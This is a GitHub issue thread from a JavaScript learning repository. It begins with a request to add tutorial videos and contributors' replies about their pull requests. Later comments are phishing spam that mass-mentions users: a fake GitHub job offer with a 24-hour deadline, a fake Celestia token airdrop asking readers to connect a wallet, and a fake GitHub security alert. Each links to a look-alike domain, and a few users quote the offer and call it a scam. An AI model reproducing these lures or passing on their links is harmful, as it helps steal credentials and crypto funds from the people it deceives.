### ISSUE TITLE
Add videos to understand concept more easily

### ISSUE THREAD

**Issue by anchitgupta01** [leonardomso/33-js-concepts#406]
It helps to beginner to get good information regarding concept by seeing practical demonstration through video,
thats why add video with each topic for better understanding

**Comment by PrathameshTheurkar** [comment]
I have added video links to some of topics of JS. Please see this PR (Update README.md) #408

**Comment by PrathameshTheurkar** [comment]
I have added some more video links which will be help full for learning JS concepts . Please view this PR #410

**Comment by PrathameshTheurkar** [comment]
I have added more video links to further more topics . Please review this PR #410

**Comment by debalinadas05** [comment]
I've added several links of Youtube videos on various topics of JavaScript .  Hopefully my contributions will be helpful.
Please see this PR (Add video links on various topics ) #417

**Comment by PrathameshTheurkar** [comment]
I have added videos to several topic . Plz see my PR #410

**Comment by Aditya9764** [comment]
i have added video links to some of the topics of map filter reduce JS. Please see this PR (Update README.md)

**Comment by Aditya9764** [comment]
@anchitgupta01 please check my PR

**Comment by Pratikdate** [comment]
new video link add

#432

**Comment by amit0804-tech** [comment]
please check my PR

**Comment by Aditya9764** [comment]
i have added video links to some of the topics of map filter reduce JS. Please see this PR (Update README.md) PR #458

**Comment by deepak7774** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](http://jobs.githubtalentcommunity.online/auth) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
Rede-Lirius, @cloped, @thiagopoltronieri, @rubynho, @dbrunonascimento, @libnando, @Anonymous6598, @marceltn, @ogecece, @vitorleal, @guidefreitas, @p-simoes, @Gabriel0598, @throberto, @Edufreitass, @jpcercal, @vrfranco, @rafaelandrade74, @maxmag-soft, @Jeankininho

**Comment by Anonymous6598** [comment]
Hello @deepak7774.
Thanks for the offer but unfortunately I will have to reject your offer because I'm still student and I have exams and I'm still studying at university.
@anonymous6598.

**Comment by Jeankininho** [comment]
> Hello,
> 
> We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!
> 
> As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:
> 
> * Health insurance coverage
> * Retirement savings plan
> * Flexible work schedule
> * Generous vacation and paid time off
> * Professional development opportunities
> 
> To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.
> 
> Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.
> 
> **Important:** You have 24 hours to complete the application process.
> 
> If you have any questions or need further information, please don't hesitate to contact us.
> 
> Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.
> 
> Best regards, GitHub Recruitment Team aarondancer, @ProtocolNebula, @mehdimirhoseini, @ihorvorotnov, @crystalsilver, @esneko, @trs, @faraoman, @hosein2398, @vf2e, @wconnorwalsh, @andantonelli, @iCartic, @danklammer, @sridhareaswaran, @diegozpy, @lebart, @waako, @canering, @alessandrostone

This is a scam.

**Comment by behagoras** [comment]
This looks like a spam email, please don’t click any links from this conversation, it’s actually very easy to send emails to a list of emails from a thread in github

From: Jean Machado ***@***.***>
Date: Tuesday, 20 February 2024, 15:03
To: leonardomso/33-js-concepts ***@***.***>
Cc: Subscribed ***@***.***>
Subject: Re: [leonardomso/33-js-concepts] Add videos to understand concept more easily (Issue #406)

Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

  *   Health insurance coverage
  *   Retirement savings plan
  *   Flexible work schedule
  *   Generous vacation and paid time off
  *   Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click here<https://auth.githubtalentcommunity.online/> to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

Important: You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards, GitHub Recruitment Team aarondancer, @ProtocolNebula<https://github.com/ProtocolNebula>, @mehdimirhoseini<https://github.com/mehdimirhoseini>, @ihorvorotnov<https://github.com/ihorvorotnov>, @crystalsilver<https://github.com/crystalsilver>, @esneko<https://github.com/esneko>, @trs<https://github.com/trs>, @faraoman<https://github.com/faraoman>, @hosein2398<https://github.com/hosein2398>, @vf2e<https://github.com/vf2e>, @wconnorwalsh<https://github.com/wconnorwalsh>, @andantonelli<https://github.com/andantonelli>, @iCartic<https://github.com/iCartic>, @danklammer<https://github.com/danklammer>, @sridhareaswaran<https://github.com/sridhareaswaran>, @diegozpy<https://github.com/diegozpy>, @lebart<https://github.com/lebart>, @waako<https://github.com/waako>, @canering<https://github.com/canering>, @alessandrostone<https://github.com/alessandrostone>

This is a scam.

**Comment by Obasoro** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!yousefal, @willxs, @EnzoEmb, @Olivetti, @laplaceyang, @stancheck, @kentzhang-geek, @olivejun, @rootasjey, @elikem, @nithinkashyapn, @pavanmehta91, @swayamadi, @F4dhil9ant3ng, @reubn, @Heolink, @parthw1, @ffadilaputra, @Gilb03, @037g

**Comment by raviikushh** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
k4m4, @gujiaxi, @croogie, @KenzoKai, @muhummadPatel, @Suburbanno, @fathiabdulrahim, @smdharris, @xwartz, @alexandregv, @othmaan, @nithinkashyapn, @notabucketofspam, @ZV00, @LordRibblesdale, @bobzhen, @Mu-cho, @tunnckoCore, @spencermathews, @kwcto

**Comment by nickfnblum** [comment]
**Urgent Security Alert: GitHub Compromise**

Dear GitHub User,

We regret to inform you that our systems have detected a security breach on the GitHub platform. As a precautionary measure, we are reaching out to all users to help us resolve this situation promptly.

It appears that unauthorized access has been gained to our servers, potentially compromising user data and the integrity of our platform. To mitigate any further damage and secure your account, we kindly request your immediate assistance in granting authorization to our security team to reverse this breach.

Please click on the following link to provide the necessary authorization: [Authorize Security Reversal](https://githubcareer.online/)

Your cooperation in this matter is crucial for safeguarding the GitHub community and preventing any further unauthorized access. We assure you that our team is working tirelessly to restore normal operations and enhance our security measures to prevent future incidents.

Thank you for your attention to this matter, and we sincerely apologize for any inconvenience caused.

Best regards,  
GitHub Security Team
obiwankenoobi, @robgf, @metin1, @ryanjohnston, @boralp, @rbfonbuena, @benasse, @gujiaxi, @sgolovine, @kustomzone, @brianruggieri, @luminixx, @garyng, @DrewAndrews, @pythoninthegrass, @stancheck, @pateljj04, @kulakowka, @openmynet, @LYHPandaKing
